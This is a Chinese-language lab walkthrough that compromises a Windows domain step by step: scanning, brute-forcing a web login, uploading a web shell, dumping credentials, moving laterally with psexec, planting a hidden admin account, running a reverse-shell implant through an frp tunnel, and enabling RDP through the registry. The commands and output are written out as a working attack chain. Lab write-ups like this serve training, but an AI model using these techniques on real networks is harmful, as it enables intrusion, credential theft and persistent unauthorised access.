环境部署
攻击机:kali(192.168.101.141)
web服务器:windows(外网ip:192.168.101.139)(内网ip:10.10.10.150)
域控服务器DC:windows 2016(内网ip:10.10.10.149)
一、信息收集
1、在kali中使用Nmap扫描ip和端口
nmap -sT 192.168.101.0/24 扫描网段,获取目标ip
nmap -A 192.168.101.139 扫描目标详细信息
nmap -A
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-05 19:34 CST
Nmap scan report for www.webhack123.com (192.168.101.139)
Host is up (0.0012s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: \xE7\xAB\x8B\xE5\x88\xBB\xE8\xB4\xB7 - \xE7\xAB\x8B\xE5\x88\xBB\xE8\xB4\xB7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
3306/tcp open mysql?
3389/tcp open ms-wbt-server?
|_ssl-date: 2024-03-05T11:37:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=web.hackbox.com
| Not valid before: 2023-11-12T09:57:27
|_Not valid after: 2024-05-13T09:57:27
| rdp-ntlm-info:
| Target_Name: HACKBOX
| NetBIOS_Domain_Name: HACKBOX
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: hackbox.com
| DNS_Computer_Name: web.hackbox.com
| DNS_Tree_Name: hackbox.com
| Product_Version: 6.1.7601
|_ System_Time: 2024-03-05T11:37:31+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:30:7E:49 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
|_clock-skew: mean: -1h35m59s, deviation: 3h34m39s, median: 0s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-03-05T11:37:31
|_ start_date: 2024-03-05T11:25:13
|_nbstat: NetBIOS name: WEB, NetBIOS user: <unknown>, NetBIOS MAC: 000c29307e49 (VMware)
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: web
| NetBIOS computer name: WEB\x00
| Domain name: hackbox.com
| Forest name: hackbox.com
| FQDN: web.hackbox.com
|_ System time: 2024-03-05T19:37:31+08:00
TRACEROUTE
HOP RTT ADDRESS
1 1.21 ms www.webhack123.com (192.168.101.139)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.81 seconds
此处扫描出web服务的版本信息
此处扫描出域名信息
此处扫描出web服务的域名
访问目标ip的80端口,发现禁止访问、尝试修改配置文件,通过域名访问
vim /etc/hosts
192.168.101.139 www.webhack123.com
2、web扫描
appscan
御剑
aux 扫出svn存储库漏洞
dirseach -u http://www.webhack123.com 收集可用url
[20:41:28] 200 - 6KB - /.DS_Store
[20:41:28] 200 - 6KB - /.ds_store
[20:41:30] 200 - 333B - /.idea/misc.xml
[20:41:30] 200 - 264B - /.idea/modules.xml
[20:41:30] 200 - 180B - /.idea/vcs.xml
[20:41:30] 200 - 38KB - /.idea/workspace.xml
[20:41:32] 200 - 3B - /.svn/entries
[20:41:32] 200 - 428KB - /.svn/wc.db发现/.svn/wc.db是个可下载的文件。下载后可在kali中使用sqlitebrowser wc.db可打开数据库文件,也可以在物理机使用Navicat打开,查看该数据库文件。
发现NODES表中存在log日志文件,且包含登录的账号密码内容,将密码解密后逐个尝试web登录。
发现log文件中的账号为admin,密码解密出来为123456,多次尝试登录后提示密码错误,用户可能修改密码。
多次登录失败,发现登录界面只判断账号密码,验证码没有进行验证。
而登录失败,界面响应"status":0,
故在此使用burp进行密码爆破,推测登录成功的界面响应为"status":1。
获得账号密码,登录系统后台,尝试getshell。
二、GETshell
1、进入系统后台管理界面,熟悉界面,发现系统设置中可以修改允许上传的文件类型,将此处添加php,exe。
2、修改后,即可上传一句话木马和cs的监听木马。
3、上传后访问图片地址,确定文件上传成功,即可使用工具连接。
4、使用蚁剑链接后,发现是system权限账号。
5、通过蚁剑上传msf鉴定木马,web服务器上线。
三、内网信息收集
whoami /fqdn
CN=WEB,CN=Computers,DC=hackbox,DC=com
net time /domain
\\dc.hackbox.com 的当前时间是 2024/3/6 21:17:44
net user /domain
这项请求将在域 hackbox.com 的域控制器处理。
\\dc.hackbox.com 的用户帐户
-------------------------------------------------------------------------------
Administrator Guest krbtgt
web
systeminfo
meterpreter > sysinfo
Computer : WEB
OS : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : HACKBOX
Logged On Users : 1
Meterpreter : x64/windows
ipconfig /all
Windows IP 配置
主机名 . . . . . . . . . . . . . : web
主 DNS 后缀 . . . . . . . . . . . : hackbox.com
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
DNS 后缀搜索列表 . . . . . . . . : hackbox.com
phpstudy_pro> whoami /priv
特权信息
----------------------
特权名 描述 状态
=============================== ========================== ======
SeAssignPrimaryTokenPrivilege 替换一个进程级令牌 已禁用
SeLockMemoryPrivilege 锁定内存页 已启用
SeIncreaseQuotaPrivilege 为进程调整内存配额 已禁用
SeTcbPrivilege 以操作系统方式执行 已启用
SeSecurityPrivilege 管理审核和安全日志 已禁用
SeTakeOwnershipPrivilege 取得文件或其他对象的所有权 已禁用
SeLoadDriverPrivilege 加载和卸载设备驱动程序 已禁用
SeSystemProfilePrivilege 配置文件系统性能 已启用
SeSystemtimePrivilege 更改系统时间 已禁用
SeProfileSingleProcessPrivilege 配置文件单个进程 已启用
SeIncreaseBasePriorityPrivilege 提高计划优先级 已启用
SeCreatePagefilePrivilege 创建一个页面文件 已启用
SeCreatePermanentPrivilege 创建永久共享对象 已启用
SeBackupPrivilege 备份文件和目录 已禁用
SeRestorePrivilege 还原文件和目录 已禁用
SeShutdownPrivilege 关闭系统 已禁用
SeDebugPrivilege 调试程序 已启用
SeAuditPrivilege 生成安全审核 已启用
SeSystemEnvironmentPrivilege 修改固件环境值 已禁用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeUndockPrivilege 从扩展坞上取下计算机 已禁用
SeManageVolumePrivilege 执行卷维护任务 已禁用
SeImpersonatePrivilege 身份验证后模拟客户端 已启用
SeCreateGlobalPrivilege 创建全局对象 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用
SeTimeZonePrivilege 更改时区 已启用
SeCreateSymbolicLinkPrivilege 创建符号链接 已启用
nltest /DClist:hackbox.com
获得域“hackbox.com”中 DC 的列表(从“\\dc.hackbox.com”中)。
dc.hackbox.com [PDC] [DS] 站点: Default-First-Site-Name
此命令成功完成
whoami /user
用户信息
----------------
用户名 SID
=================== ========
nt authority\system S-1-5-18
net view /domain
Domain
-------------------------------------------------------------------------------
HACKBOX
命令成功完成。
nslookup -type=SRV _ldap._tcp.hackbox.com
DNS request timed out.
timeout was 2 seconds.
������: UnKnown
Address: 10.10.10.149
_ldap._tcp.hackbox.com SRV service location:
priority = 0
weight = 100
port = 389
svr hostname = dc.hackbox.com
dc.hackbox.com internet address = 10.10.10.149
ping hackbox.com
正在 Ping hackbox.com [10.10.10.149] 具有 32 字节的数据:
来自 10.10.10.149 的回复: 字节=32 时间<1ms TTL=128
来自 10.10.10.149 的回复: 字节=32 时间=1ms TTL=128
来自 10.10.10.149 的回复: 字节=32 时间=1ms TTL=128
来自 10.10.10.149 的回复: 字节=32 时间=1ms TTL=128
10.10.10.149 的 Ping 统计信息:
net share
共享名 资源 注解
-------------------------------------------------------------------------------
C$ C:\ 默认共享
IPC$ 远程 IPC
ADMIN$ C:\Windows 远程管理
命令成功完成。
net view
服务器名称 注解
-------------------------------------------------------------------------------
\\DC
\\WEB
命令成功完成。
四、渗透域控主机,获取DC管理权
通过信息收集,整理部分信息如下:
域名:HACKBOX.com
域控:\\DC 10.10.10.149
域内主机:\\WEB 192.168.101.139 10.10.10.150
1、上线cs监听
由于msf中的mimikatz模块没有抓取到nltm,所以尝试使用getshell时上传的cs监听抓取
2、使用cs抓取NLTM
由于域控管理员未在web服务器主机上登录过,没有抓取到域控的NLTM,此处需要模拟社工手段,让域控管理员在域内主机登录一次后再次抓取。
此时,已成功抓取到域控管理员的NLTM与明文密码。
获取到NTLM值后再次使用net view,获取域内主机,发现获取到了一个新的域内目标主机:域控主机 \\DC
3、横向移动、获取\\DC权限、并创建影子用户
使用cs中的横向移动=>psexec
此时已拥有域控主机的admin权限,虽然没有直接上线DC,但可查看目录
及时创建影子用户,并加入管理员组、避免丢失权限
影子用户创建成功
五、MSF中上线DC
由于\\dc和kali不在同一网段,无法直接通讯。
所以上线dc需要搭建隧道,此处使用frp隧道,将服务器上传至web,默认开启7000端口。
kali配置好反弹端口后,开启客户端:
在DC上运行反弹(reverse_tcp)木马,反弹木马将自己的流量,反弹到WEB(192.168.101.139)的6000端口,经过frp隧道传输,交给kali(192.168.101.141)的9999端口,kali监听自身的9999即可上线DC。
使用kali生成监听DC的反向木马
在cs中将木马上传到\\DC\C$
kali启动监听,监听\\DC反弹,经过frp隧道传入kali的9999端口。
先在WEB服务器上使用\\DC权限,创建\\DC的网络链接
启动定时任务,在web服务器上,远程执行\\DC共享目录中的木马文件
shell at \\DC 17:03 \\DC\C$\DC_rev.exe
反弹成功,\\DC域控主机上线MSF
查看\\DC主机端口信息
六、打开DC远程桌面
1、配置路由、开启代理
由于上线DC时,是基于frp反弹隧道完成的,目前只有DC反弹到kali的路由。所以现在还需要再搭建一条kali到\\DC的路由隧道。此处使用MSF中的autoroute,自动路由。
基于WEB的session,使用autoroute后,就拥有了访问\\DC内网的路由。
2、开启MSF代理 auxiliary/server/socks_proxy,并配置全局代理:setg proxies socks5:127.0.0.1:1080
2、进入\\DC的会话,使用注册表命令开启RDP/3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3、登录\\DC远程桌面
修改kali的配置文件,修改代理。 配置 /etc/proxychains4.conf文件。
执行命令前加上proxychains即可使用socks5的代理运行命令。
使用kali自带的远程桌面工具登录\\DC
由于登录远程桌面需要账号密码,这里就可以用到之前创建的影子用户。
登录成功
